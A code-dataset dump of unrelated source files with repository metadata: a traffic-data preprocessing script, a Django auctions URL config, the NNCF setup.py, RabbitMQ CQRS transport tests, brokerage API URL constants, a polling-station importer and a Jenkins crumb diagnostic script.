df = df.replace(0, np.nan)
df = df.fillna(method='ffill')
df = df.fillna(0.0)
# 0 is the latest observed sample.
x_offsets = np.sort(
# np.concatenate(([-week_size + 1, -day_size + 1], np.arange(-11, 1, 1)))
np.concatenate((np.arange(1-args.history_length, 1, 1),)) # -11, -5, -2
)
# Predict the next one hour
y_offsets = np.sort(np.arange(1, 1+args.horizon, 1)) # 4, 7, 13
# x: (num_samples, input_length, num_nodes, input_dim)
# y: (num_samples, output_length, num_nodes, output_dim)
x, y = generate_graph_seq2seq_io_data(
df,
x_offsets=x_offsets,
y_offsets=y_offsets,
add_time_in_day=True,
add_day_in_week=False,
)
x_mask, y_mask = generate_graph_seq2seq_io_data(
zero_mask,
x_offsets=x_offsets,
y_offsets=y_offsets,
add_time_in_day=True,
add_day_in_week=False,
)
print("x shape: ", x.shape, ", y shape: ", y.shape)
# Write the data into npz file.
# num_test = 6831, using the last 6831 examples as testing.
# for the rest: 7/8 is used for training, and 1/8 is used for validation.
num_samples = x.shape[0]
num_test = round(num_samples * 0.2)
num_train = round(num_samples * 0.7)
num_val = num_samples - num_test - num_train
# train
x_train, y_train = x[:num_train], y[:num_train] * y_mask[:num_train]
# val
x_val, y_val = (
x[num_train: num_train + num_val],
y[num_train: num_train + num_val] * y_mask[num_train: num_train + num_val],
)
# test
x_test, y_test = x[-num_test:], y[-num_test:] * y_mask[-num_test:]
for cat in ["train", "val", "test"]:
_x, _y = locals()["x_" + cat], locals()["y_" + cat]
print(cat, "x: ", _x.shape, "y:", _y.shape)
np.savez_compressed(
os.path.join(args.output_dir, "%s-history-%d-horizon-%d.npz" % (cat, args.history_length, args.horizon)),
x=_x,
y=_y,
x_offsets=x_offsets.reshape(list(x_offsets.shape) + [1]),
y_offsets=y_offsets.reshape(list(y_offsets.shape) + [1]),
)
def main(args):
print("Generating training data")
generate_train_val_test(args)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--output_dir", type=str, default="data/", help="Output directory."
)
parser.add_argument(
"--traffic_df_filename",
type=str,
default="data/metr-la.h5",
help="Raw traffic readings.",
)
parser.add_argument(
"--horizon",
type=int,
default=3,
help="The length of horison.",
)
parser.add_argument(
"--history_length",
type=int,
default=3,
help="The length of history.",
)
args = parser.parse_args()
main(args)
| 32.014085
| 117
| 0.611967
|
d717487aa4102ae3687cf9071c840341e2e31d43
| 1,219
|
py
|
Python
|
auctions/urls.py
|
KonstantineDM/django-ecommerce-auctions
|
b0e788d2badd38f3916ff2a740038ece6070f179
|
[
"MIT"
] | null | null | null |
auctions/urls.py
|
KonstantineDM/django-ecommerce-auctions
|
b0e788d2badd38f3916ff2a740038ece6070f179
|
[
"MIT"
] | null | null | null |
auctions/urls.py
|
KonstantineDM/django-ecommerce-auctions
|
b0e788d2badd38f3916ff2a740038ece6070f179
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
app_name = "auctions"
urlpatterns = [
path("", views.index, name="index"),
path("login", views.login_view, name="login"),
path("logout", views.logout_view, name="logout"),
path("register", views.register, name="register"),
path("listing/<int:listing_id>", views.view_listing, name="listing"),
path("<int:user_id>/create_listing", views.create_listing, name="create_listing"),
path("listing/<int:listing_id>/", views.close_listing, name="close_listing"),
path("listing/<int:listing_id>/bid", views.bid_add, name="bid"),
path("<int:user_id>/watchlist", views.watchlist_view, name="watchlist"),
path("listing/<int:listing_id>/watchlist_add", views.watchlist_add, name="watchlist_add"),
path("listing/<int:listing_id>/watchlist_remove", views.watchlist_remove, name="watchlist_remove"),
path("listing/<int:listing_id>/comment_add", views.comment_add, name="comment_add"),
path("listing/<int:listing_id>/comment_view", views.comment_view, name="comment_view"),
path("categories", views.categories, name="categories"),
path("category/<int:cat_id>", views.category_listings, name="category_listings"),
]
| 40.633333
| 103
| 0.711239
|
c8abc39d5f165ba2b54464121c97df4c11be596a
| 5,370
|
py
|
Python
|
setup.py
|
krodyush/nncf
|
476a274a90a3f2f1ace7a4cb0c9d90d1ddeb7f6a
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
krodyush/nncf
|
476a274a90a3f2f1ace7a4cb0c9d90d1ddeb7f6a
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
krodyush/nncf
|
476a274a90a3f2f1ace7a4cb0c9d90d1ddeb7f6a
|
[
"Apache-2.0"
] | 1
|
2021-04-05T09:33:51.000Z
|
2021-04-05T09:33:51.000Z
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import glob
import stat
import sys
import sysconfig
import codecs
import os
import re
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open("{}/README.md".format(here), "r") as fh:
long_description = fh.read()
def read(*parts):
with codecs.open(os.path.join(here, *parts), 'r') as fp:
return fp.read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
INSTALL_REQUIRES = ["ninja",
"addict",
"pillow",
"texttable",
"scipy==1.3.2",
"networkx",
"graphviz",
"jsonschema",
"pydot",
"tensorboardX",
"jstyleson",
"matplotlib",
"numpy",
"tqdm",
"onnx",
"opencv-python",
"pytest-mock",
"prettytable",
"mdutils",
"yattag",
"jsonschema",
"wheel",
"defusedxml"]
DEPENDENCY_LINKS = []
python_version = sys.version_info[:2]
if python_version[0] < 3:
print("Only Python > 3.5 is supported")
sys.exit(0)
elif python_version[1] < 5:
print("Only Python > 3.5 is supported")
sys.exit(0)
version_string = "{}{}".format(sys.version_info[0], sys.version_info[1])
INSTALL_REQUIRES.extend(["torch", "torchvision"])
TORCH_VERSION = "1.5.0"
TORCHVISION_VERSION = "0.6.0"
CUDA_VERSION = "102"
IS_CUDA_VER_DEFAULT_FOR_CURRENT_TORCH_VER = True
TORCH_SOURCE_URL_TEMPLATE = 'https://download.pytorch.org/whl/{mode}/torch-{tv}{whl_mode}-cp{ver}-cp{' \
'ver}m-linux_x86_64.whl'
TORCHVISION_SOURCE_URL_TEMPLATE = 'https://download.pytorch.org/whl/{mode}/torchvision-{tvv}{whl_mode}-cp{ver}-cp{' \
'ver}m-linux_x86_64.whl'
WHL_MODE_TEMPLATE = '%2B{mode}'
if "--cpu-only" in sys.argv:
mode = 'cpu'
whl_mode = WHL_MODE_TEMPLATE.format(mode=mode)
DEPENDENCY_LINKS = [
TORCH_SOURCE_URL_TEMPLATE.format(
tv=TORCH_VERSION,
ver=version_string,
mode=mode,
whl_mode=whl_mode),
TORCHVISION_SOURCE_URL_TEMPLATE.format(
tvv=TORCHVISION_VERSION,
ver=version_string,
mode=mode,
whl_mode=whl_mode)]
sys.argv.remove("--cpu-only")
else:
mode = "cu{}".format(CUDA_VERSION)
whl_mode = '' if IS_CUDA_VER_DEFAULT_FOR_CURRENT_TORCH_VER else WHL_MODE_TEMPLATE.format(mode=mode)
DEPENDENCY_LINKS = [
TORCH_SOURCE_URL_TEMPLATE.format(
tv=TORCH_VERSION,
ver=version_string,
mode=mode,
whl_mode=whl_mode),
TORCHVISION_SOURCE_URL_TEMPLATE.format(
tvv=TORCHVISION_VERSION,
ver=version_string,
mode=mode,
whl_mode=whl_mode)]
EXTRAS_REQUIRE = {
"tests": [
"pytest"],
"docs": []
}
setup(
name="nncf",
version=find_version(os.path.join(here, "nncf/version.py")),
author="Intel",
author_email="alexander.kozlov@intel.com",
description="Neural Networks Compression Framework",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/openvinotoolkit/nncf_pytorch",
packages=find_packages(exclude=["tests", "tests.*",
"examples", "examples.*",
"tools", "tools.*"]),
dependency_links=DEPENDENCY_LINKS,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
keywords=["compression", "quantization", "sparsity", "mixed-precision-training",
"quantization-aware-training", "hawq", "classification",
"pruning", "object-detection", "semantic-segmentation", "nlp",
"bert", "transformers", "mmdetection"],
include_package_data=True
)
path_to_ninja = glob.glob(str(sysconfig.get_paths()["purelib"]+"/ninja*/ninja/data/bin/"))
if path_to_ninja:
path_to_ninja = str(path_to_ninja[0]+"ninja")
if not os.access(path_to_ninja, os.X_OK):
st = os.stat(path_to_ninja)
os.chmod(path_to_ninja, st.st_mode | stat.S_IEXEC)
| 32.944785
| 117
| 0.600931
|
5c1e050d252df0a765cd0e48e1d90b5c0a4f42e2
| 17,432
|
py
|
Python
|
tests/test_transport/test_rabbit_mq.py
|
maxipavlovic/django-cqrs
|
d401819b5bca7c2e833d44e8426251fdd4b6b8b9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_transport/test_rabbit_mq.py
|
maxipavlovic/django-cqrs
|
d401819b5bca7c2e833d44e8426251fdd4b6b8b9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_transport/test_rabbit_mq.py
|
maxipavlovic/django-cqrs
|
d401819b5bca7c2e833d44e8426251fdd4b6b8b9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright © 2021 Ingram Micro Inc. All rights reserved.
import logging
from datetime import datetime, timedelta, timezone
from importlib import import_module, reload
from dj_cqrs.constants import SignalType
from dj_cqrs.dataclasses import TransportPayload
from dj_cqrs.delay import DelayMessage, DelayQueue
from dj_cqrs.transport.rabbit_mq import RabbitMQTransport
from django.db import DatabaseError
from pika.exceptions import AMQPError
import pytest
from tests.utils import db_error
import ujson
class PublicRabbitMQTransport(RabbitMQTransport):
@classmethod
def get_common_settings(cls):
return cls._get_common_settings()
@classmethod
def get_consumer_settings(cls):
return cls._get_consumer_settings()
@classmethod
def get_produced_message_routing_key(cls, *args):
return cls._get_produced_message_routing_key(*args)
@classmethod
def consume_message(cls, *args):
return cls._consume_message(*args)
@classmethod
def delay_message(cls, *args):
return cls._delay_message(*args)
@classmethod
def fail_message(cls, *args):
return cls._fail_message(*args)
@classmethod
def process_delay_messages(cls, *args):
return cls._process_delay_messages(*args)
@classmethod
def produce_message(cls, *args):
return cls._produce_message(*args)
def test_default_settings():
s = PublicRabbitMQTransport.get_common_settings()
assert s[0] == 'localhost'
assert s[1] == 5672
assert s[2].username == 'guest' and s[2].password == 'guest'
assert s[3] == 'cqrs'
def test_non_default_settings(settings, caplog):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'host': 'rabbit',
'port': 8000,
'user': 'usr',
'password': 'pswd',
'exchange': 'exchange',
}
s = PublicRabbitMQTransport.get_common_settings()
assert s[0] == 'rabbit'
assert s[1] == 8000
assert s[2].username == 'usr' and s[2].password == 'pswd'
assert s[3] == 'exchange'
def test_default_url_settings(settings):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'url': 'amqp://localhost',
}
s = PublicRabbitMQTransport.get_common_settings()
assert s[0] == 'localhost'
assert s[1] == 5672
assert s[2].username == 'guest' and s[2].password == 'guest'
assert s[3] == 'cqrs'
def test_non_default_url_settings(settings):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'url': 'amqp://usr:pswd@rabbit:8000',
'exchange': 'exchange',
}
s = PublicRabbitMQTransport.get_common_settings()
assert s[0] == 'rabbit'
assert s[1] == 8000
assert s[2].username == 'usr' and s[2].password == 'pswd'
assert s[3] == 'exchange'
def test_invalid_url_settings(settings):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'url': 'rabbit://localhost',
}
with pytest.raises(AssertionError) as ei:
PublicRabbitMQTransport.get_common_settings()
assert ei.match('Scheme must be "amqp" for RabbitMQTransport.')
def test_consumer_default_settings(settings):
settings.CQRS['queue'] = 'replica'
settings.CQRS['replica'].pop('dead_letter_queue', None)
s = PublicRabbitMQTransport.get_consumer_settings()
assert s[1] == 'dead_letter_replica'
assert s[2] == 1001
def test_consumer_non_default_settings(settings, caplog):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'queue': 'q',
'consumer_prefetch_count': 2,
'replica': {
'delay_queue_max_size': None, # Infinite
},
}
s = PublicRabbitMQTransport.get_consumer_settings()
assert s[0] == 'q'
assert s[1] == 'dead_letter_q'
assert s[2] == 0 # Infinite
assert "The 'consumer_prefetch_count' setting is ignored for RabbitMQTransport." in caplog.text
@pytest.fixture
def rabbit_transport(settings):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'queue': 'replica',
}
module = reload(import_module('dj_cqrs.transport'))
yield module.current_transport
def amqp_error(*args, **kwargs):
raise AMQPError
def test_produce_connection_error(rabbit_transport, mocker, caplog):
mocker.patch.object(RabbitMQTransport, '_get_producer_rmq_objects', side_effect=amqp_error)
rabbit_transport.produce(
TransportPayload(
SignalType.SAVE, 'CQRS_ID', {'id': 1}, 1,
),
)
assert "CQRS couldn't be published: pk = 1 (CQRS_ID)." in caplog.text
def test_produce_publish_error(rabbit_transport, mocker, caplog):
mocker.patch.object(
RabbitMQTransport, '_get_producer_rmq_objects', return_value=(mocker.MagicMock(), None),
)
mocker.patch.object(RabbitMQTransport, '_produce_message', side_effect=amqp_error)
rabbit_transport.produce(
TransportPayload(
SignalType.SAVE, 'CQRS_ID', {'id': 1}, 1,
),
)
assert "CQRS couldn't be published: pk = 1 (CQRS_ID)." in caplog.text
def test_produce_ok(rabbit_transport, mocker, caplog):
caplog.set_level(logging.INFO)
mocker.patch.object(
RabbitMQTransport, '_get_producer_rmq_objects', return_value=(mocker.MagicMock(), None),
)
mocker.patch.object(RabbitMQTransport, '_produce_message', return_value=True)
rabbit_transport.produce(
TransportPayload(
SignalType.SAVE, 'CQRS_ID', {'id': 1}, 1,
),
)
assert 'CQRS is published: pk = 1 (CQRS_ID)' in caplog.text
def test_produce_message_ok(mocker):
expires = datetime(2100, 1, 1, tzinfo=timezone.utc)
expected_expires = '2100-01-01T00:00:00+00:00'
channel = mocker.MagicMock()
payload = TransportPayload(
SignalType.SAVE,
cqrs_id='cqrs_id',
instance_data={},
instance_pk='id',
previous_data={'e': 'f'},
expires=expires,
retries=2,
)
PublicRabbitMQTransport.produce_message(channel, 'exchange', payload)
assert channel.basic_publish.call_count == 1
basic_publish_kwargs = channel.basic_publish.call_args[1]
assert ujson.loads(basic_publish_kwargs['body']) == {
'signal_type': SignalType.SAVE,
'cqrs_id': 'cqrs_id',
'instance_data': {},
'instance_pk': 'id',
'previous_data': {'e': 'f'},
'correlation_id': None,
'expires': expected_expires,
'retries': 2,
}
assert basic_publish_kwargs['exchange'] == 'exchange'
assert basic_publish_kwargs['mandatory']
assert basic_publish_kwargs['routing_key'] == 'cqrs_id'
assert basic_publish_kwargs['properties'].content_type == 'text/plain'
assert basic_publish_kwargs['properties'].delivery_mode == 2
def test_produce_sync_message_no_queue(mocker):
channel = mocker.MagicMock()
payload = TransportPayload(SignalType.SYNC, 'cqrs_id', {}, None)
PublicRabbitMQTransport.produce_message(channel, 'exchange', payload)
basic_publish_kwargs = channel.basic_publish.call_args[1]
assert ujson.loads(basic_publish_kwargs['body']) == {
'signal_type': SignalType.SYNC,
'cqrs_id': 'cqrs_id',
'instance_data': {},
'instance_pk': None,
'previous_data': None,
'correlation_id': None,
'expires': None,
'retries': 0,
}
assert basic_publish_kwargs['routing_key'] == 'cqrs_id'
def test_produce_sync_message_queue(mocker):
channel = mocker.MagicMock()
payload = TransportPayload(SignalType.SYNC, 'cqrs_id', {}, 'id', 'queue')
PublicRabbitMQTransport.produce_message(channel, 'exchange', payload)
basic_publish_kwargs = channel.basic_publish.call_args[1]
assert ujson.loads(basic_publish_kwargs['body']) == {
'signal_type': SignalType.SYNC,
'cqrs_id': 'cqrs_id',
'instance_data': {},
'instance_pk': 'id',
'previous_data': None,
'correlation_id': None,
'expires': None,
'retries': 0,
}
assert basic_publish_kwargs['routing_key'] == 'cqrs.queue.cqrs_id'
def test_consume_connection_error(rabbit_transport, mocker, caplog):
mocker.patch.object(
RabbitMQTransport, '_get_consumer_rmq_objects', side_effect=amqp_error,
)
mocker.patch('time.sleep', side_effect=db_error)
with pytest.raises(DatabaseError):
rabbit_transport.consume()
assert 'AMQP connection error. Reconnecting...' in caplog.text
def test_consume_ok(rabbit_transport, mocker):
consumer_generator = (v for v in [(1, None, None)])
mocker.patch.object(
RabbitMQTransport,
'_get_consumer_rmq_objects',
return_value=(None, None, consumer_generator),
)
mocker.patch.object(
RabbitMQTransport, '_consume_message', db_error,
)
with pytest.raises(DatabaseError):
rabbit_transport.consume()
def test_consume_message_ack(mocker, caplog):
caplog.set_level(logging.INFO)
consumer_mock = mocker.patch('dj_cqrs.controller.consumer.consume')
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(),
mocker.MagicMock(),
None,
'{"signal_type":"signal","cqrs_id":"cqrs_id","instance_data":{},'
'"instance_pk":1, "previous_data":{}, "correlation_id":"abc",'
'"expires":"2100-01-01T00:00:00+00:00", "retries":1}',
mocker.MagicMock(),
)
assert consumer_mock.call_count == 1
payload = consumer_mock.call_args[0][0]
assert payload.signal_type == 'signal'
assert payload.cqrs_id == 'cqrs_id'
assert payload.instance_data == {}
assert payload.previous_data == {}
assert payload.pk == 1
assert payload.correlation_id == 'abc'
assert payload.expires == datetime(2100, 1, 1, tzinfo=timezone.utc)
assert payload.retries == 1
assert 'CQRS is received: pk = 1 (cqrs_id), correlation_id = abc.' in caplog.text
assert 'CQRS is applied: pk = 1 (cqrs_id), correlation_id = abc.' in caplog.text
def test_consume_message_nack(mocker, caplog):
caplog.set_level(logging.INFO)
mocker.patch('dj_cqrs.controller.consumer.consume', return_value=None)
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(),
mocker.MagicMock(),
None,
'{"signal_type":"signal","cqrs_id":"basic","instance_data":{},'
'"instance_pk":1,"previous_data":null,'
'"expires":"2100-01-01T00:00:00+00:00", "retries":0}',
mocker.MagicMock(),
)
assert 'CQRS is received: pk = 1 (basic), correlation_id = None.' in caplog.text
assert 'CQRS is failed: pk = 1 (basic), correlation_id = None, retries = 0.' in caplog.text
def test_consume_message_nack_deprecated_structure(mocker, caplog):
caplog.set_level(logging.INFO)
consumer_mock = mocker.patch('dj_cqrs.controller.consumer.consume', return_value=None)
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(),
mocker.MagicMock(),
None,
'{"signal_type":"signal","cqrs_id":"cqrs_id","instance_data":{}}',
mocker.MagicMock(),
)
assert consumer_mock.call_count == 0
assert "CQRS couldn't proceed, instance_pk isn't found in body" in caplog.text
def test_consume_message_expired(mocker, caplog):
caplog.set_level(logging.INFO)
channel = mocker.MagicMock()
PublicRabbitMQTransport.consume_message(
channel,
mocker.MagicMock(),
None,
'{"signal_type":"signal","cqrs_id":"cqrs_id","instance_data":{},'
'"instance_pk":1,"previous_data":null,'
'"expires":"2000-01-01T00:00:00+00:00", "retries":0}',
mocker.MagicMock(),
)
assert channel.basic_nack.call_count == 1
assert 'CQRS is received: pk = 1 (cqrs_id)' in caplog.text
assert 'CQRS is added to dead letter queue: pk = 1 (cqrs_id)' in caplog.text
def test_consume_message_json_parsing_error(mocker, caplog):
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(), mocker.MagicMock(), None, '{bad_payload:', mocker.MagicMock(),
)
assert ": {bad_payload:." in caplog.text
def test_consume_message_package_structure_error(mocker, caplog):
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(), mocker.MagicMock(), None, 'inv{"pk":"1"}', mocker.MagicMock(),
)
assert """CQRS couldn't be parsed: inv{"pk":"1"}""" in caplog.text
def test_fail_message_with_retry(mocker):
payload = TransportPayload(SignalType.SAVE, 'basic', {'id': 1}, 1)
delay_queue = DelayQueue()
PublicRabbitMQTransport.fail_message(mocker.MagicMock(), 100, payload, None, delay_queue)
assert delay_queue.qsize() == 1
delay_message = delay_queue.get()
assert delay_message.delivery_tag == 100
assert delay_message.payload is payload
def test_message_without_retry_dead_letter(settings, mocker, caplog):
settings.CQRS['replica']['CQRS_MAX_RETRIES'] = 1
produce_message = mocker.patch(
'dj_cqrs.transport.rabbit_mq.RabbitMQTransport._produce_message',
)
channel = mocker.MagicMock()
payload = TransportPayload(
SignalType.SAVE, 'basic', {'id': 1}, 1, correlation_id='abc', retries=2,
)
delay_queue = DelayQueue()
PublicRabbitMQTransport.fail_message(channel, 1, payload, None, delay_queue)
assert delay_queue.qsize() == 0
assert channel.basic_nack.call_count == 1
assert produce_message.call_count == 1
produce_payload = produce_message.call_args[0][2]
assert produce_payload is payload
assert getattr(produce_message, 'is_dead_letter', False)
assert 'CQRS is failed: pk = 1 (basic), correlation_id = abc, retries = 2.' in caplog.text
assert (
'CQRS is added to dead letter queue: pk = 1 (basic), correlation_id = abc' in caplog.text
)
def test_fail_message_invalid_model(mocker, caplog):
nack = mocker.patch(
'dj_cqrs.transport.rabbit_mq.RabbitMQTransport._nack',
)
payload = TransportPayload(SignalType.SAVE, 'not_existing', {'id': 1}, 1)
delay_queue = DelayQueue()
delivery_tag = 101
PublicRabbitMQTransport.fail_message(
mocker.MagicMock(), delivery_tag, payload, None, delay_queue,
)
assert delay_queue.qsize() == 0
assert nack.call_count == 1
assert nack.call_args[0][1] == delivery_tag
assert 'Model for cqrs_id not_existing is not found.' in caplog.text
def test_get_produced_message_routing_key_dead_letter(settings):
settings.CQRS['replica']['dead_letter_queue'] = 'dead_letter_replica'
payload = TransportPayload(SignalType.SYNC, 'CQRS_ID', {}, None)
payload.is_dead_letter = True
routing_key = PublicRabbitMQTransport.get_produced_message_routing_key(payload)
assert routing_key == 'cqrs.dead_letter_replica.CQRS_ID'
def test_get_produced_message_routing_key_requeue(settings):
settings.CQRS['queue'] = 'replica'
payload = TransportPayload(SignalType.SAVE, 'CQRS_ID', {}, None)
payload.is_requeue = True
routing_key = PublicRabbitMQTransport.get_produced_message_routing_key(payload)
assert routing_key == 'cqrs.replica.CQRS_ID'
def test_process_delay_messages(mocker, caplog):
channel = mocker.MagicMock()
produce = mocker.patch('dj_cqrs.transport.rabbit_mq.RabbitMQTransport.produce')
payload = TransportPayload(SignalType.SAVE, 'CQRS_ID', {'id': 1}, 1)
delay_queue = DelayQueue()
delay_queue.put(
DelayMessage(delivery_tag=1, payload=payload, eta=datetime.now(tz=timezone.utc)),
)
PublicRabbitMQTransport.process_delay_messages(channel, delay_queue)
assert delay_queue.qsize() == 0
assert channel.basic_nack.call_count == 1
assert produce.call_count == 1
produce_payload = produce.call_args[0][0]
assert produce_payload is payload
assert produce_payload.retries == 1
assert getattr(produce_payload, 'is_requeue', False)
assert 'CQRS is requeued: pk = 1 (CQRS_ID)' in caplog.text
def test_delay_message_with_requeue(mocker, caplog):
channel = mocker.MagicMock()
requeue_message = mocker.patch(
'dj_cqrs.transport.rabbit_mq.RabbitMQTransport._requeue_message',
)
delay_messages = []
for delay in (2, 1, 3):
payload = TransportPayload(SignalType.SAVE, 'CQRS_ID', {'id': delay}, delay)
eta = datetime.now(tz=timezone.utc) + timedelta(hours=delay)
delay_message = DelayMessage(delivery_tag=delay, payload=payload, eta=eta)
delay_messages.append(delay_message)
delay_queue = DelayQueue(max_size=3)
for delay_message in delay_messages:
delay_queue.put(delay_message)
exceeding_delay = 0
exceeding_payload = TransportPayload(SignalType.SAVE, 'CQRS_ID', {'id': 4}, 4)
PublicRabbitMQTransport.delay_message(
channel, 4, exceeding_payload, exceeding_delay, delay_queue,
)
assert delay_queue.qsize() == 3
assert delay_queue.get().payload is exceeding_payload
assert (
'CQRS is delayed: pk = 4 (CQRS_ID), correlation_id = None, delay = 0 sec' in caplog.text
)
assert requeue_message.call_count == 1
requeue_payload = requeue_message.call_args[0][2]
min_eta_delay_message = sorted(delay_messages, key=lambda x: x.eta)[0]
assert requeue_payload is min_eta_delay_message.payload
| 32.221811
| 99
| 0.686324
|
ec7e323c40507e47f815676d07aee98108747612
| 1,377
|
py
|
Python
|
ioapi/api_url.py
|
luisparravicini/ioapi
|
f9d60a28032fd54163ea15b8256aba1d48ec4dcc
|
[
"MIT"
] | null | null | null |
ioapi/api_url.py
|
luisparravicini/ioapi
|
f9d60a28032fd54163ea15b8256aba1d48ec4dcc
|
[
"MIT"
] | null | null | null |
ioapi/api_url.py
|
luisparravicini/ioapi
|
f9d60a28032fd54163ea15b8256aba1d48ec4dcc
|
[
"MIT"
] | 1
|
2020-05-03T04:34:32.000Z
|
2020-05-03T04:34:32.000Z
|
URL_ACCOUNT_STATE = "/api/v2/estadocuenta"
URL_MARKET_RATES = "/api/v2/Cotizaciones/{instrument}/{panel}/{country}"
URL_MUTUAL_FUND = "/api/v2/Titulos/FCI/{symbol}"
URL_MUTUAL_FUND_IN_MARKET = "/api/v2/{market}/Titulos/{symbol}"
URL_MUTUAL_FUND_OPTIONS = "/api/v2/{market}/Titulos/{symbol}/Opciones"
URL_MUTUAL_FUNDS = "/api/v2/Titulos/FCI"
URL_MUTUAL_FUNDS_ADMINS = "/api/v2/Titulos/FCI/Administradoras"
URL_MUTUAL_FUNDS_BY_ADMIN_AND_TYPE = "/api/v2/Titulos/FCI/Administradoras/{admin}/TipoFondos/{fcitype}"
URL_MUTUAL_FUNDS_TYPES = "/api/v2/Titulos/FCI/TipoFondos"
URL_MUTUAL_FUNDS_TYPES_BY_ADMIN = "/api/v2/Titulos/FCI/Administradoras/{admin}/TipoFondos"
URL_INSTRUMENT = "/api/v2/{country}/Titulos/Cotizacion/Paneles/{instrument}"
URL_INSTRUMENTS = "/api/v2/{country}/Titulos/Cotizacion/Instrumentos"
URL_OPERATE_BUY = "/api/v2/operar/Comprar"
URL_OPERATE_SELL = "/api/v2/operar/Vender"
URL_OPERATE_SUBSCRIBE = "/api/v2/operar/suscripcion/fci"
URL_OPERATE_RESCUE = "/api/v2/operar/rescate/fci"
URL_OPERATION = "/api/v2/operaciones/{number}"
URL_OPERATIONS = "/api/v2/operaciones/"
URL_OPERATIONS_DELETE = "/api/v2/operaciones/{number}"
URL_PORTFOLIO = "/api/v2/portafolio/{country}"
URL_STOCK = "/api/v2/{market}/Titulos/{symbol}/Cotizacion"
URL_STOCK_HISTORY = "/api/v2/{market}/Titulos/{symbol}/Cotizacion/seriehistorica/{date_from}/{date_to}/{fit}"
URL_TOKEN = "/token"
| 57.375
| 109
| 0.77923
|
f13e71efc7ba3129ed52bb13b6addc007ec8774b
| 866
|
py
|
Python
|
polling_stations/apps/data_importers/management/commands/import_cardiff.py
|
smsmith97/UK-Polling-Stations
|
ecbd98cb99e89e97354da3960b0063aa36181b11
|
[
"BSD-3-Clause"
] | 29
|
2015-03-10T08:41:34.000Z
|
2022-01-12T08:51:38.000Z
|
polling_stations/apps/data_importers/management/commands/import_cardiff.py
|
smsmith97/UK-Polling-Stations
|
ecbd98cb99e89e97354da3960b0063aa36181b11
|
[
"BSD-3-Clause"
] | 4,112
|
2015-04-01T21:27:38.000Z
|
2022-03-31T19:22:11.000Z
|
polling_stations/apps/data_importers/management/commands/import_cardiff.py
|
smsmith97/UK-Polling-Stations
|
ecbd98cb99e89e97354da3960b0063aa36181b11
|
[
"BSD-3-Clause"
] | 31
|
2015-03-18T14:52:50.000Z
|
2022-02-24T10:31:07.000Z
|
from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "CRF"
addresses_name = "2021-03-24T16:24:49.782410/cardiff_deduped.tsv"
stations_name = "2021-03-24T16:24:49.782410/cardiff_deduped.tsv"
elections = ["2021-05-06"]
csv_delimiter = "\t"
csv_encoding = "windows-1252"
def address_record_to_dict(self, record):
uprn = record.property_urn.strip().lstrip("0")
if uprn == "100100110392":
return None
if record.addressline6 in [
"CF24 3DZ",
"CF3 0UH",
"CF14 2FN",
"CF14 6PE",
"CF24 4RU",
"CF3 4LL",
"CF5 6HF",
"CF14 9UA",
]:
return None
return super().address_record_to_dict(record)
| 27.0625
| 81
| 0.594688
|
1aa9ce05fe3c8c24013d4dba1c29dfc768a7c2f6
| 988
|
py
|
Python
|
src/main/resources/scripts/crumbDiag.py
|
MatthewQueenan/vectorcast-execution-plugin
|
db8d00239db9ab3229c22378727527d4621ca30e
|
[
"MIT"
] | null | null | null |
src/main/resources/scripts/crumbDiag.py
|
MatthewQueenan/vectorcast-execution-plugin
|
db8d00239db9ab3229c22378727527d4621ca30e
|
[
"MIT"
] | null | null | null |
src/main/resources/scripts/crumbDiag.py
|
MatthewQueenan/vectorcast-execution-plugin
|
db8d00239db9ab3229c22378727527d4621ca30e
|
[
"MIT"
] | null | null | null |
import requests
import sys
import os
verbose=True
try:
username=os.environ['USERNAME']
password=os.environ['PASSWORD']
except:
print "Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables"
sys.exit(-1)
jenkins_url=os.environ['JENKINS_URL']
url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)'
print url
if username:
crumb = requests.get(url, auth=(username, password))
if crumb.status_code == 200:
crumb_headers = dict()
crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1]
if verbose:
print "Got crumb: %s" % crumb.text
else:
print "Failed to get crumb"
print "\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:"
print "Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm"
print jenkins_url + "/configureSecurity"
sys.exit(-1)
| 35.285714
| 119
